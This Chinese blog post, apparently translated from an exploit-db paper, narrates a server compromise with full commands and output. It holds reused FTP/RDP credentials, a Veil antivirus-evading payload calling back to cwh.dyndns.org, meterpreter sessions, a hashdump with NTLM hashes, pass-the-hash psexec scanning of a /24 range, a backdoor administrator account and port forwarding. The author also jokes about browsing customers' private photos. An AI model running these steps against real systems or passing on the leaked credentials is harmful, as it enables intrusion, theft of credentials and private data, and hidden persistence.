牛牛逼逼叉叉
菜单

手机应用入侵日记(下)

2014年02月11日,分类《网络安全》,作者:
博客捐助

手机应用入侵日记(上)》发布后广受好评,现在推出下集,希望各位喜欢。

 

[0x03] – 服务端攻击

 

“多数情况下,与客户端通信的是一个或多个web服务器。对手机应用服务器端的攻击与对普通的web站点攻击类似。除了寻找web应用的漏洞,还需要对目标主机进行扫描,看看运行了哪些服务,之后再进行漏洞扫描,来找到潜在的漏洞。当然,要在许可的情况下进行这些操作喔。”

——SANS渗透测试博客

 

      [0x03a] – 扫描

 

根据上文,我们已经从源码中找到了后台IP地址(203.60.240.180 和 203.60.240.183),接下来,我们就要用Nmap扫描来检测下它的安全性。

首先用 nmap (http://nmap.org)对目标主机进行扫描来查看开放的端口。

对于203.60.240.180,Nmap 扫描结果 :

—————————————————————

[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

 

01 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT
02
03 Nmap scan report for 203.60.240.180
04
05 Host is up (0.0047s latency).
06
07 Not shown: 998 filtered ports
08
09 PORT     STATE SERVICE  VERSION
10
11 80/tcp   open  http     Microsoft IIS httpd 7.0
12
13 443/tcp  open  ssl/http Microsoft IIS httpd 7.0
14
15 3389/tcp open  ms-wbt-server?
16
17 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
18
19 Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
20
21 Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds

—————————————————————

 

 

 

对于203.60.240.183,Nmap 扫描结果 :

—————————————————————

[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

 

01 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT
02
03 Nmap scan report for 203.60.240.183
04
05 Host is up (0.0036s latency).
06
07 Not shown: 997 filtered ports
08
09 PORT     STATE SERVICE  VERSION
10
11 21/tcp   open  ftp      Microsoft ftpd
12
13 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
14
15 Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
16
17 Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

—————————————————————

 

从扫描结果中,我们找到了开着的端口,在203.60.240.180 运行着IIS还有终端服务, 203.60.240.183运行着FTP服务。是时候来采摘我们的果实了。

 

 

[0x03b] – 获取权限

 

因为我们已经在源码中找到了用户名和密码(“msec1s”,”S1lentM!@#$ec”)。我们就能访问服务器上运行的FTP服务了。如下:

FTP Server: 203.60.240.183

—————————————————————

01 [zeq3ul@12:40:12]-[~]> ftp 203.60.240.183
02
03 Connected to 203.60.140.183
04
05 220 Microsoft FTP Service
06
07 User <203.60.140.183:<none>>: msec1s
08
09 331 Password required
10
11 Password:
12
13 230 User logged in.
14
15 ftp> pwd
16
17 257 "/" is current directory.
18
19 ftp>

—————————————————————

现在我们已经使用账号”msec1s”登录上了FTP服务器。我们能够访问所有客户的联系人,照片,视频等等了。我们希望找到一些“有趣的”照片或者剪辑的视频;但是我们发现了DICK!!!WTF(不懂就百度)!!我们就停止了搜索。给跪…

 

 

把目标移向下一个主机, 203.60.240.180, 我们试着通过终端服务来访问它. 非常幸运,我们使用FTP的那个用户名密码(“msec1s”,”S1lentM!@#$ec”)就能访问(大忌!几个服务都使用同一个账号密码)。太爽了!

使用rdesktop访问远程桌面

—————————————————————

[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180

—————————————————————

另外, “msecls” 账号还有管理员权限. 越来越爽了!

[0x03c] – 绕过杀毒软件

 

很多杀毒软件通过特征码来查杀病毒。如果杀软发现恶意软件的特征码,就会隔离或是清除它。如果杀软在文件中找不到病毒特征码,就认为它是安全的。

Veil,这个由Blackhat安全专家Chris Truncer写的payload生成工具,可以帮助我们出色的完成这个任务。

源码下载:https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus、

对veil的利用,可以看本站原创翻译的文章《Veil—绕过杀毒软件的payload生成器》。

 

使用我们的payload和msfveom shellcode,选择Reverse HTTPS到我们的web服务器(cwh.dyndns.org),命令如下:

 

01 ==================================================================
02
03 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
04
05 ==================================================================
06
07 [?] Use msfvenom or supply custom shellcode?
08
09 1 - msfvenom (default)
10
11 2 - Custom
12
13 [>] Please enter the number of your choice: 1
14
15 [?] What type of payload would you like?
16
17 1 - Reverse TCP
18
19 2 - Reverse HTTP
20
21 3 - Reverse HTTPS
22
23 0 - Main Menu
24
25 >] Please enter the number of your choice: 3
26
27 [?] What's the Local Host IP Address: cwh.dyndns.org
28
29 [?] What's the LocalPort Number: 443
30
31 ---------------------------------------------------------------

现在我们已经得到了payload.exe文件,只要windows系统执行该文件,它就会立刻试着连到我们的服务器上。

[0x03d] – 拿下系统 !!

该拿下系统了!因为可以使用远程桌面服务(端口:3389)来访问目标服务器(203.60.140.180),目标主机能访问内网,我们就可以打开web服务器,然后远程登录到服务器,执行我们的payload(payload.exe)。运行的Metasploit payload(payload.exe)会连(reverse_https)到我们服务器(cwh.dyndns.org)上的meterpreter payload。

之后,我们使用hashdump得到服务器上的LM/NTLM hash,但是这是行不通的,因为如果你是64位系统,但是meterpreter不运行在64位系统上,就会失败,告诉我们版本不对(Meterpreter是32位程序).所以我们需要找到一个进程来移植然后在这反弹程序。本例中我们把我们的进程移植到到Winlogon进程(64位)上。

过程如下:

—————————————————————

[zeq3ul@13:16:14]-[~]> sudo msfconsole

[sudo] password for zeq3ul:

1 Call trans opt: received. 2-19-98 13:18:48 REC:Loc
2
3 Trace program: running
4
5 http://metasploit.pro=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
6
7 + -- --=[ 1113 exploits - 701 auxiliary - 192 post
8
9 + -- --=[ 300 payloads - 29 encoders - 8 nops

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

PAYLOAD => windows/meterpreter/reverse_https

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > set LHOST cwh.dyndns.org

LHOST => cwh.dyndns.org

msf exploit(handler) > set ExitOnSession false

ExitOnSession => false

msf exploit(handler) > exploit -j

1 [*] Exploit running as background job.
2
3 [*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/
01 msf exploit(handler) > [*] Starting the payload handler...
02
03 [*] 203.60.240.180:49160 Request received for /oOTJ...
04
05 [*] 203.60.240.180:49160 Staging connection for target /oOTJ received...
06
07 [*] Patched user-agent at offset 640488...
08
09 [*] Patched transport at offset 640148...
10
11 [*] Patched URL at offset 640216...
12
13 [*] Patched Expiration Timeout at offset 640748...
14
15 [*] Patched Communication Timeout at offset 640752...
16
17 [*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700
18
19 sessions -l
20
21 Active sessions
22
23 ===============
24
25 Id  Type                   Information                                      Connection
26
27 --  ----                   -----------                                      ----------
28
29 1   meterpreter x86/win32  WIN-UUOFVQRLB13msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
30
31 msf exploit(handler) > sessions -i 1
32
33 [*] Starting interaction with 1...
34
35 meterpreter > sysinfo
36
37 Computer        : WIN-UUOFVQRLB13
38
39 OS              : Windows 2008 R2 (Build 7600).
40
41 Architecture    : x64 (Current Process is WOW64)
42
43 System Language : en_US
44
45 Meterpreter     : x86/win32
46
47 meterpreter > ps -S winlogon
48
49 Filtering on process name...
50
51 Process List
52
53 ============
54
55 PID  PPID  Name          Arch    Session  User                 Path
56
57 ---  ----  ----          ----    -------  ----                 ----
58
59 384  340   winlogon.exe  x86_64  1        NT AUTHORITYSYSTEM  C:WindowsSystem32winlogon.exe
60
61 meterpreter > migrate 384
62
63 [*] Migrating from 1096 to 384...
64
65 [*] Migration completed successfully.

meterpreter > sysinfo

1 Computer        : WIN-UUOFVQRLB13
2
3 OS              : Windows 2008 R2 (Build 7600).
4
5 Architecture    : x64
6
7 System Language : en_US
8
9 Meterpreter     : x64/win64

meterpreter > run hashdump

01 [*] Obtaining the boot key...
02
03 [*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...
04
05 [*] Obtaining the user list and keys...
06
07 [*] Decrypting user keys...
08
09 [*] Dumping password hints...
10
11 No users with password hints on this system
12
13 [*] Dumping password hashes...
14
15 Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
16
17 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
18
19 msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::

————————————————————

现在,我们已经获得目标机器上的哈希了。哈希在手,权限我有啊,木哈哈~~

[0x03e] – 还没有结束

在正常情况下,我们接下来就要破解得到的hash了。破解windows hash会有花很多时间(呃,其实win下的密码哈希很好破解),所以你希望不费太多时间久可以绕过密码验证?

传递哈希密码攻击或许会是一个很好的方法,最简单利用“传递哈希密码攻击”的方法是利用Metasploit内置的PSEXEC module模块(exploit/windows/smb/psexec),这个模块能执行一个提供任意验证功能的payload。

这个payload能伪造一个 Windows SMB 服务的管理员证书(如果当你有了管理员的password或 hash后), 然后再在目标机子上建立一个windows的服务,然后你可以通过这个服务为跳板来提权。 当你获取到一台windows系统机器的哈希值的话,这个工具就成为你的首选的渗透测试工具啦。

著名黑客Carlos Perez也写出了psexec_scanner批量扫描版本,如果有兴趣的ri友,可以从下面的连接找到。

http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

—————————————————————

meterpreter > background

[*] Backgrounding session 1…

msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner

msf auxiliary(psexec_scanner) > show options

01 Module options (auxiliary/scanner/smb/psexec_scanner):
02
03 Name       Current Setting                                                    Required  Description
04
05 ----       ---------------                                                    --------  -----------
06
07 HANDLER    true                                                               no        Start an Exploit Multi Handler to receive the connection
08
09 LHOST                                                                         yes       Local Hosts for payload to connect.
10
11 LPORT                                                                           yes       LocalPort for payload to connect.
12
13 OPTIONS                                                                       no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
14
15 PAYLOAD    windows/meterpreter/reverse_tcp                                    yes       Payload to use against Windows host
16
17 RHOSTS                                                                        yes       Range of hosts to scan.
18
19 SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
20
21 SMBDomain  WORKGROUP                                                          yes       SMB Domain
22
23 SMBPass                                                            no        SMB Password
24
25 SMBUser                                                                        no        SMB Username
26
27 THREADS                                                                       yes       The number of concurrent threads
28
29 TYPE       manual                                                             no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org

LHOST => cwh.dyndns.org

msf auxiliary(psexec_scanner) > set LPORT 8443

LPORT => 8443

msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24

RHOSTS => 203.60.240.0/24

msf auxiliary(psexec_scanner) > set SMBUser administrator

SMBUser => administrator

msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72

SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72

msf auxiliary(psexec_scanner) > set THREADS 10

THREADS => 10

msf auxiliary(psexec_scanner) > exploit

001 [*] Using the username and password provided
002
003 [*] Starting exploit multi handler
004
005 [*] Started reverse handler on cwh.dyndns.org:8443
006
007 [*] Starting the payload handler...
008
009 [*] Scanned 031 of 256 hosts (012% complete)
010
011 [*] Scanned 052 of 256 hosts (020% complete)
012
013 [*] Scanned 077 of 256 hosts (030% complete)
014
015 [*] Scanned 111 of 256 hosts (043% complete)
016
017 [*] Scanned 129 of 256 hosts (050% complete)
018
019 [*] Scanned 154 of 256 hosts (060% complete)
020
021 [*] 203.60.240.165:445 - TCP OPEN
022
023 [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
024
025 [*] 203.60.240.180:445 - TCP OPEN
026
027 [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
028
029 [*] Connecting to the server...
030
031 [*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'...
032
033 [*] Connecting to the server...
034
035 [*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'...
036
037 [*] Uploading payload...
038
039 [*] Uploading payload...
040
041 [*] Created ExigHylG.exe...
042
043 [*] Created xMhdkXDt.exe...
044
045 [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[svcctl] ...
046
047 [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[svcctl] ...
048
049 [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[svcctl] ...
050
051 [*] Obtaining a service manager handle...
052
053 [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[svcctl] ...
054
055 [*] Obtaining a service manager handle...
056
057 [*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")...
058
059 [*] Creating a new service (qJTBfPjT - "MhIpwSR")...
060
061 [*] Closing service handle...
062
063 [*] Closing service handle...
064
065 [*] Opening service...
066
067 [*] Opening service...
068
069 [*] Starting the service...
070
071 [*] Starting the service...
072
073 [*] Removing the service...
074
075 [*] Removing the service...
076
077 [*] Sending stage (751104 bytes) to 203.60.240.180
078
079 [*] Closing service handle...
080
081 [*] Closing service handle...
082
083 [*] Deleting xMhdkXDt.exe...
084
085 [*] Deleting ExigHylG.exe...
086
087 [*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700
088
089 [*] Sending stage (751104 bytes) to 203.60.240.165
090
091 [*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700
092
093 [*] Scanned 181 of 256 hosts (070% complete)
094
095 [*] Scanned 205 of 256 hosts (080% complete)
096
097 [*] Scanned 232 of 256 hosts (090% complete)
098
099 [*] Scanned 256 of 256 hosts (100% complete)
100
101 [*] Auxiliary module execution completed

msf auxiliary(psexec_scanner) > sessions -l

01 Active sessions
02
03 ===============
04
05 Id  Type                   Information                               Connection
06
07 --  ----                   -----------                               ----------
08
09 1   meterpreter x86/win32  WIN-UUOFVQRLB13msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
10
11 2   meterpreter x86/win32  NT AUTHORITYSYSTEM @ WIN-UUOFVQRLB13     cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)
12
13 3   meterpreter x86/win32  NT AUTHORITYSYSTEM @ WIN-HDO6QC2QVIV     cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)

msf auxiliary(psexec_scanner) > sessions -i 3

[*] Starting interaction with 3…

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > sysinfo

01 Computer        : WIN-HDO6QC2QVIV
02
03 OS              : Windows 2008 R2 (Build 7600).
04
05 Architecture    : x64 (Current Process is WOW64)
06
07 System Language : en_US
08
09 Meterpreter     : x86/win32
10
11 meterpreter > shell
12
13 Process 2568 created.
14
15 Channel 1 created.
16
17 Microsoft Windows [Version 6.1.7600]
18
19 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
20
21 C:Windowssystem32>net user cwh 5plus4=10 /add
22
23 net user cwh 5plus4=10 /add
24
25 The command completed successfully.
26
27 C:Windowssystem32>net localgroup administrators cwh /add
28
29 net localgroup administrators cwh /add
30
31 The command completed successfully.
32
33 C:Windowssystem32>exit

—————————————————————

现在我们需要处理下一个主机了(203.60.240.165).

输入”netstat -an” 查看目标主机开放的端口,我们发现开放了3389端口,但是我们不能直接登录,因为该端口被防火墙过滤了。但是我们可以绕过它。

我们使用Meterpreter中的”portfwd”命令。Portfwd是个常见的利用pivoting技术来提供给攻击主机直接访问目标主机,他的原理就是自动打开另一条TCP连接,将目标端口转发到自动开辟的这条连接的端口上。你可以使用下列的命令来连接你的攻击主机和你的目标主机:

—————————————————————

1 meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389
2
3 [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389

—————————————————————

最后, 我们使用下面的 rdesktop 命令来连接目标服务器(203.60.240.165):

—————————————————————

1 [zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost

—————————————————————

撸了这么久终于射了,好爽啊!!!

到这里,我们的攻击已经从刚开始的从手机应用里面搜集信息到最后的提权。中间的突破口是在手机应用的反汇编文件中找到它连接的FTP服务器的账号与密码,再通过一点社会工程学猜出了另一台web服务器机器的密码。提权的时候,紧跟着metasploit的步伐,算是一次MSF的高级利用吧,其实也将后面提权的部分看做是一次MSF提权的高级教程

原文链接:http://www.exploit-db.com/papers/26620/

日币奖励:

本文为译文且为原创、首发,文章较生动形象,并有一定技术含量,给予日币奖励共6枚,译者与修改者分别获得3枚日币。

本文由网络攻防研究室(www.91ri.org)信息安全小组v2djia月巴_又鸟原创翻译,转载请注明出处。



发表评论

电子邮件地址不会被公开。 必填项已用*标注

【上一篇】

手机应用入侵日记(上)

【下一篇】

Veil—绕过杀毒软件的payload生成器